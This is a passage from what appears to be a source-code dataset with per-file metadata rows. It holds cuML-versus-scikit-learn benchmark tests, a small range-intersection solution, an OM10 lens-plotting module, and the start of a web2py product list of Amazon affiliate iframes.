    kwargs = {"nrows": d["shape"][0], "ncols": d["shape"][1], "cached": d["data"]}
    if "train_split" in d:
        kwargs["train_split"] = d["train_split"]
    if "label_col" in d:
        kwargs["label_col"] = d["label_col"]
    data = load_data(**kwargs)

    if d["module"] == "cuml":
        import cudf

        if isinstance(data, dict):
            for k, v in data.items():
                data[k] = cudf.DataFrame.from_pandas(v)
            data["y_train"] = cudf.Series(data["y_train"]["fea0"])
        else:
            data = cudf.DataFrame.from_pandas(data)

    return {"module": d["module"], "data": data}
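# The tests below are pytest benchmarks parametrized over module, shape, and
# dataset path; a hypothetical invocation that runs only the cuml PCA cases:
#   pytest benchmark_ml.py -k "PCA and cuml"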
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_PCA(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.decomposition")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {
            "n_components": 10,
            "whiten": False,
            "random_state": 42,
            "svd_solver": "full",
        }
        pca = m.PCA(**kwargs)
        pca.fit_transform(data["data"])

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {"module": module, "shape": shape, "data": data},
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["small"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_DBSCAN(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.cluster")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {"eps": 3, "min_samples": 2}
        if data["module"] == "sklearn":
            kwargs["n_jobs"] = -1
            kwargs["algorithm"] = "brute"
        dbscan = m.DBSCAN(**kwargs)
        dbscan.fit(data["data"])

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {"module": module, "shape": shape, "data": data},
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_TSVD(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.decomposition")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {"n_components": 10, "random_state": 42}
        if data["module"] == "sklearn":
            kwargs["algorithm"] = "arpack"
        elif data["module"] == "cuml":
            kwargs["algorithm"] = "full"
        tsvd = m.TruncatedSVD(**kwargs)
        tsvd.fit_transform(data["data"])

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {"module": module, "shape": shape, "data": data},
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["small"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_KNN(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.neighbors")
    else:
        m = importlib.import_module("cuml.neighbors.nearest_neighbors")

    def compute_func(data):
        kwargs = {}
        n_neighbors = 10
        if data["module"] == "sklearn":
            kwargs["metric"] = "sqeuclidean"
            kwargs["n_jobs"] = -1
        knn = m.NearestNeighbors(**kwargs)
        knn.fit(data["data"])
        knn.kneighbors(data["data"], n_neighbors)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {"module": module, "shape": shape, "data": data},
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_SGD(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.linear_model")
    else:
        m = importlib.import_module("cuml.solvers")

    def compute_func(data):
        kwargs = {
            "learning_rate": "adaptive",
            "eta0": 0.07,
            "penalty": "elasticnet",
            "loss": "squared_loss",
            "tol": 0.0,
        }
        if data["module"] == "sklearn":
            kwargs["max_iter"] = 10
            kwargs["fit_intercept"] = True
            sgd = m.SGDRegressor(**kwargs)
        elif data["module"] == "cuml":
            kwargs["epochs"] = 10
            kwargs["batch_size"] = 512
            sgd = m.SGD(**kwargs)
        X_train = data["data"]["X_train"]
        y_train = data["data"]["y_train"]
        sgd.fit(X_train, y_train)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {
            "module": module,
            "shape": shape,
            "data": data,
            "train_split": 0.8,
            "label_col": 4,
        },
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_LinearRegression(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.linear_model")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {"fit_intercept": True, "normalize": True}
        if data["module"] == "cuml":
            kwargs["algorithm"] = "eig"
        X_train = data["data"]["X_train"]
        y_train = data["data"]["y_train"]
        lr = m.LinearRegression(**kwargs)
        lr.fit(X_train, y_train)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {
            "module": module,
            "shape": shape,
            "data": data,
            "train_split": 0.8,
            "label_col": 4,
        },
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_Ridge(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.linear_model")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {"fit_intercept": False, "normalize": True, "alpha": 0.1}
        if data["module"] == "cuml":
            kwargs["solver"] = "svd"
        X_train = data["data"]["X_train"]
        y_train = data["data"]["y_train"]
        ridge = m.Ridge(**kwargs)
        ridge.fit(X_train, y_train)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {
            "module": module,
            "shape": shape,
            "data": data,
            "train_split": 0.8,
            "label_col": 4,
        },
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_Lasso(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.linear_model")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {
            "alpha": np.array([0.001]),
            "fit_intercept": True,
            "normalize": False,
            "max_iter": 1000,
            "selection": "cyclic",
            "tol": 1e-10,
        }
        X_train = data["data"]["X_train"]
        y_train = data["data"]["y_train"]
        lasso = m.Lasso(**kwargs)
        lasso.fit(X_train, y_train)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {
            "module": module,
            "shape": shape,
            "data": data,
            "train_split": 0.8,
            "label_col": 4,
        },
    )


@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_ElasticNet(benchmark, module, shape, data):
    if module == "sklearn":
        m = importlib.import_module("sklearn.linear_model")
    else:
        m = importlib.import_module("cuml")

    def compute_func(data):
        kwargs = {
            "alpha": np.array([0.001]),
            "fit_intercept": True,
            "normalize": False,
            "max_iter": 1000,
            "selection": "cyclic",
            "tol": 1e-10,
        }
        X_train = data["data"]["X_train"]
        y_train = data["data"]["y_train"]
        elastic = m.ElasticNet(**kwargs)
        elastic.fit(X_train, y_train)

    run_benchmark(
        benchmark,
        m,
        compute_func,
        load_mortgage,
        {
            "module": module,
            "shape": shape,
            "data": data,
            "train_split": 0.8,
            "label_col": 4,
        },
    )
| 26.841727 | 82 | 0.54132 | 0 | 0 | 0 | 0 | 8,530 | 0.762083 | 0 | 0 | 2,476 | 0.22121 |
hexsha: cdc72216af29eaceb6c114484063fc2831f99596 | size: 420 | ext: py | lang: Python
repo: staguchi0703/problems_easy @ 82804b99b3ce8104762c3f6f5cc60b009a17bdc8 | path: ABC127C/resolve.py | licenses: ["MIT"]
stars: null | issues: null | forks: null

def resolve():
    '''
    Count the integers contained in every one of the M ranges [L, R] within 1..N.
    '''
    N, M = [int(item) for item in input().split()]
    LRs = [[int(item) for item in input().split()] for _ in range(M)]

    L_max = 0
    R_min = N
    for L, R in LRs:
        L_max = max(L_max, L)
        R_min = min(R_min, R)

    delta = R_min - L_max
    if delta >= 0:
        print(delta + 1)
    else:
        print(0)


if __name__ == "__main__":
    resolve()
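# Worked example (hypothetical stdin: "10 2", then "2 5" and "3 7"):
#   L_max = 3, R_min = 5, delta = 2 -> prints 3 (the integers 3, 4 and 5 lie
#   inside both ranges)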
| 16.8 | 69 | 0.490476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.083333 |
hexsha: cdc9ffbc19062cc077e25fb215d33c0447db75e0 | size: 7,109 | ext: py | lang: Python
repo: drphilmarshall/OM10 @ 009c16f0ef4e1c5f8f78c78df3c7711b7be24938 | path: om10/plotting.py | licenses: ["MIT"]
stars: 5 (2017-02-17T19:43:54.000Z – 2021-05-19T09:30:53.000Z) | issues: 55 (2015-02-06T19:25:58.000Z – 2021-03-09T07:57:04.000Z) | forks: 16 (2015-01-29T23:55:45.000Z – 2021-04-16T03:06:38.000Z)

# ======================================================================
# Globally useful modules, imported here and then accessible by all
# functions in this file:
from __future__ import print_function

# Fonts, latex:
import matplotlib
matplotlib.rc('font', **{'family': 'serif', 'serif': ['TimesNewRoman']})
matplotlib.rc('text', usetex=True)

import corner
import pylab, sys, numpy as np

# ======================================================================

def plot_sample(sample, saveImg=False, fig=None, color='black',
                parameters=('MAGI', 'IMSEP', 'VELDISP', 'ZLENS', 'ZSRC')):
    """
    Given an OM10 sample, make a corner plot of the required quantities.

    Parameters
    ----------
    parameters : str, tuple
        Names of the lens parameters to plot
    saveImg : bool
        If true, save image with standardized name.
    fig : matplotlib figure object
        Overlay plot on an existing figure

    Returns
    -------
    fig : matplotlib figure object
        New or updated figure
    """
    features, labels = extract_features(sample, parameters)
    if fig is None:
        fig = corner.corner(features, labels=labels, color=color, smooth=1.0)
    else:
        _ = corner.corner(features, labels=labels, color=color, smooth=1.0, fig=fig)
    for ax in fig.axes:
        for item in ([ax.xaxis.label, ax.yaxis.label]):
            item.set_fontsize(20)
        for item in (ax.get_xticklabels() + ax.get_yticklabels()):
            item.set_fontsize(16)
    if saveImg:
        pngfile = "om10_sample.png"
        pylab.savefig(pngfile)
        print("OM10: Sample plot saved to file:", pngfile)
    return fig

# ======================================================================

def extract_features(x, names):
    """
    Given an OM10 table of lenses, extract the required parameters and
    provide labels for them.

    Parameters
    ----------
    x : Table
        OM10 lens sample.
    names : str, tuple
        Names of features required.

    Returns
    -------
    features : float, ndarray
        Values of requested features, for each lens in the Table
    labels : str, list
        Corresponding axis labels
    """
    features = np.array([])
    labels = []
    p = len(names)
    n = len(x)
    for name in names:
        features = np.append(features, x[name])
        labels.append(axis_labels[name])
    return features.reshape(p, n).transpose(), labels
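# A minimal usage sketch (assuming `lenses` is an OM10 catalog table carrying
# the columns named in axis_labels below):
#   fig = plot_sample(lenses, parameters=('MAGI', 'ZLENS'))
#   fig = plot_sample(other_lenses, fig=fig, color='red')   # overlay a second sample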
# ======================================================================

def plot_lens(lens, saveImg=False, IQ=0.7):
    """
    Given an OM10 lens, compute some basic quantities
    and use them to plot a cartoon visualization of the lens.

    Parameters
    ----------
    saveImg : bool
        If true, save image with standardized name.
    IQ : float
        Image quality, for reference.
    """
    # # Force matplotlib to not use any Xwindows backend:
    # if saveImg:
    #     try: matplotlib.use('Agg')
    #     except: pass
    # else:
    #     try: matplotlib.use('TkAgg')
    #     except: pass

    # Pull out data for ease of use:
    id = lens['LENSID'][0]
    xi = lens['XIMG'][0]
    yi = lens['YIMG'][0]
    nim = lens['NIMG'][0]
    mui = lens['MAG'][0]
    md = lens['APMAG_I'][0]
    ms = lens['MAGI_IN'][0]
    xs = lens['XSRC'][0]
    ys = lens['YSRC'][0]
    xd = 0.0
    yd = 0.0
    zd = lens['ZLENS'][0]
    zs = lens['ZSRC'][0]
    q = 1.0 - lens['ELLIP'][0]
    phi = lens['PHIE'][0]

    print("OM10: Plotting image configuration of lens ID ", id)

    # Compute image magnitudes:
    mi = np.zeros(nim)
    lfi = np.zeros(nim)
    for i in range(nim):
        mi[i] = ms - 2.5 * np.log10(np.abs(mui[i]))
        lfi[i] = 0.4 * (24 - mi[i])
    print("OM10: lens, image magnitudes:", md, mi)
    lfd = 0.4 * (24 - md)
    # print("om10.plot_lens: lens, image log fluxes:", lfd, lfi)

    # ------------------------------------------------------------------
    # Compute caustics and critical curves:
    # ------------------------------------------------------------------

    # Start figure:
    fig = pylab.figure(figsize=(8, 8))
    # ,aspect='equal')

    # Axes limits, useful sizes:
    xmax = 1.99
    dm = 1.0 / 10

    # Plot command sets its own axes. 'bp' = blue pentagons
    # pylab.plot(xi, yi, 'bp')
    pylab.plot(xi, yi, color='blue', \
               marker='+', markersize=10, markeredgewidth=2, \
               linestyle='')
    pylab.plot(xs, ys, color='lightblue', \
               marker='+', markersize=10, markeredgewidth=2, \
               linestyle='')
    pylab.plot(xd, yd, color='orange', \
               marker='+', markersize=10, markeredgewidth=2, \
               linestyle='')

    # Ellipse to represent lens brightness:
    ell = matplotlib.patches.Ellipse((xd, yd), width=2*dm*lfd, height=2*q*dm*lfd, angle=phi, alpha=0.2, fc='orange')
    pylab.gca().add_patch(ell)

    # Circles to represent image brightness:
    for i in range(nim):
        cir = pylab.Circle((xi[i], yi[i]), radius=dm*lfi[i], alpha=0.2, fc='blue')
        pylab.gca().add_patch(cir)

    # Circle to represent seeing:
    cir = pylab.Circle((1.5, -1.5), radius=IQ/2.0, alpha=0.1, fc='grey')
    pylab.gca().add_patch(cir)
    text = '{:3.1f}" seeing'.format(IQ)
    pylab.annotate(text, (370, 5), xytext=None, fontsize=14, \
                   xycoords='axes points', textcoords='axes points')

    # Legend giving lens, source redshift:
    text1 = "$z_d$ = %5.2f" % zd
    text2 = "$z_s$ = %5.2f" % zs
    pylab.annotate(text1, (10, 430), xytext=None, fontsize=14, \
                   xycoords='axes points', textcoords='axes points')
    pylab.annotate(text2, (10, 410), xytext=None, fontsize=14, \
                   xycoords='axes points', textcoords='axes points')

    # Plot title:
    title = "OM10 lensed QSO, ID=" + str(id)
    pylab.title(title, fontsize=20)

    # Set axes labels:
    pylab.xlabel("x / arcsec", fontsize=20)
    pylab.ylabel("y / arcsec", fontsize=20)

    # Set axis limits:
    pylab.axis([-xmax, xmax, -xmax, xmax])

    # Add a grid:
    pylab.grid(color='grey', linestyle='--', linewidth=0.5)

    # Plot graph to file:
    if saveImg:
        pngfile = "om10_qso_ID=" + str(id) + ".png"
        pylab.savefig(pngfile)
        print("OM10: Lens plot saved to file:", pngfile)

# ======================================================================

axis_labels = {}
axis_labels['ZLENS'] = '$z_{\\rm d}$'
axis_labels['VELDISP'] = '$\sigma_{\\rm d}$ / km/s'
axis_labels['ELLIP'] = '$\epsilon_{\\rm d}$'
axis_labels['PHIE'] = '$\phi_{\\rm d}$ / km/s'
axis_labels['GAMMA'] = '$\gamma$'
axis_labels['PHIG'] = '$\phi_{\gamma}$'
axis_labels['ZSRC'] = '$z_{\\rm s}$'
axis_labels['MAGI'] = '$i_3$'
axis_labels['MAGI_IN'] = '$i_{\\rm s}$'
axis_labels['IMSEP'] = '$\Delta \\theta$ / arcsec'
axis_labels['i_SDSS_lens'] = '$i_{\\rm d}$ (AB mag)'
axis_labels['i_SDSS_quasar'] = '$i_{\\rm s}$ (AB mag)'
axis_labels['ug'] = '$u-g$ color'
axis_labels['gr'] = '$g-r$ color'
axis_labels['ri'] = '$r-i$ color'
axis_labels['iz'] = '$i-z$ color'

| 30.251064 | 115 | 0.549163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,489 | 0.490786 |
hexsha: cdcae84167fb352d7727b5d25c865135e36f6d5e | size: 25,254 | ext: py | lang: Python
repo: vgcarvpro/vgcarvpro @ 16d720cb49f02e4f859c27901360b34681e986c0 | path: applications/EsteEuQuero/models/produto.py | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null

# -*- coding: utf-8 -*-
def produtos():
prod = [["Rack de Teto Uno 2010 2011 2012 2013 2014 2015 a 2020 Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=qf_sp_asin_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YN8SCNQ&asins=B07YN8SCNQ&linkId=34c49f7cad089ab50501bec4ef1ba73d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Rack de Teto Uno 1984 1985 1986 1987 1988 1989 a 2013 Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=qf_sp_asin_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YN8GC65&asins=B07YN8GC65&linkId=bc9faaa23de411cc3b993d88665e5789&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Console PlayStation 4 Pro 4K 1TB - Edição Fortnite - PlayStation 4 (Versão Nacional)",'<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07Z6TBZB8&asins=B07Z6TBZB8&linkId=be458f38f2328c80cb1274652c578c8d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "consoles" ], ["Console PlayStation®5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B088GNRX3J&asins=B088GNRX3J&linkId=efae8896bbf7f8da6c1aad08c3ab276c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["HyperX ChargePlay Duo - Carregador Duplo para Controle de PS4, HyperX, Preto/Cinza",'<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07LGN8SCG&asins=B07LGN8SCG&linkId=ea42fc53d108753eb08e89eb3b18c871&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Controle DualSense - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B088GNW267&asins=B088GNW267&linkId=80d3ac67d0d30ad5da6aac1c13e2e621&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["Controle Dualshock 4 - PlayStation 4 - 
Camuflado", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07QKGCYCQ&asins=B07QKGCYCQ&linkId=6aaa982b76d5f442870d9403c6584db6&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Controle de Mídia - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08CWL62PL&asins=B08CWL62PL&linkId=aed29d1bf4b31ee03d405a1eba7f3a45&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["Câmera HD - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08CWHVZJ4&asins=B08CWHVZJ4&linkId=5a4363962def720e113160526c328c60&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Multimidia Mp5 RS-505MP5 Com Câmera De Ré RS-121BR E Sensor De Estacionamento RS-104BR PRETO FOSCO", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084XCCJNR&asins=B084XCCJNR&linkId=28f184b7039f64425de34cf824c10057&show_border=true&link_opens_in_new_window=false&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>' ,"consoles"], ["Carregador Bateria 12v 10ah Carro Moto Flutuante Cf10", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B083ZJ1S2L&asins=B083ZJ1S2L&linkId=6163a1d72b81519d03b3b1b89d379158&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Doctor Shine Revitalizador de Plásticos 500ml Cadillac", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07Y5LLWRH&asins=B07Y5LLWRH&linkId=9abc58fb6c99c067cd013445d7289311&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Central multimídia Mp5 2Din TV/USB/SD/AUX/BT Espelhamento Android e IOS H-tech HT-3220TV", '<iframe style="width:120px;height:240px;" 
marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08B447ZK2&asins=B08B447ZK2&linkId=9b5e385e0690c4d99a18cbaddd435647&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SSD A400, Kingston, SA400S37/240G, Cinza", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B01N5IB20Q&asins=B01N5IB20Q&linkId=9e38bf171a9c4da3d5c51ba38795a2bc&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["HD SSD Kingston SA400S37 480GB", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B075BKXSCQ&asins=B075BKXSCQ&linkId=2dbddb6517fd79e479deaf77f6ea75ad&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["SA400S37120G - SSD de 120GB Série A400 2,5 Sata III", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B01N6JQS8C&asins=B01N6JQS8C&linkId=28d62e33f5f79e0d2a583a5477143b09&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["SSD Desktop Notebook SATA ADATA ASU630SS-960GQ-R SU630 960GB 2.5 SATA III", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07KQXKK12&asins=B07KQXKK12&linkId=a44675fef616674decca14e99b3595f0&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["Injeção Eletrônica Programável FT450 - com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPH1Z5&asins=B07YNPH1Z5&linkId=1a35048d718fb05776eb6a2b3fcce590&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT350 - com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" 
src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPYP1S&asins=B07YNPYP1S&linkId=01bf12a8e0d9d58d7521226708c94457&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT550 - Com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZWHXCFL&asins=B07ZWHXCFL&linkId=f45ed1df394c592cdf5af122ad04dfff&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT600 SFI - Sem Chicote", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZWD5SSP&asins=B07ZWD5SSP&linkId=fb1d67279809593c7f6fe2cc87e774e9&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT500LITE SFI - Sem Chicote", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" 